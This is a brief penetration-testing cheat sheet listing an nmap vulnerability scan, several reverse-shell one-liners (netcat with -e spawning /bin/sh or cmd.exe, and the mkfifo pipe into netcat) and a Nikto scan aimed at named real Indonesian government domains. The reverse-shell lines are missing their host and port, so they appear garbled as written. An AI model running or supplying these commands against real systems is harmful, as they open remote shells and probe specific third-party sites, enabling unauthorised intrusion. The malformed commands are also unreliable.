1. Nmap

nmap -sV -vv -O -T5 –scan=vuln ip/subnet -oX filename.xml

Scan all service and check operating system with aggresive scanning also with mod scanning vulnerability and make the output xml type with filename.xml (later can be open with zenmap)

2. Reverse Shell

nc -e /bin/sh nc -e C:\Windows\System32\cmd.exe rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f

3. Nikto

perl nikto.pl -host kkp.go.id;www.wpi.kkp.go.id -output ~/kkp/random -Format htm

scan target with output html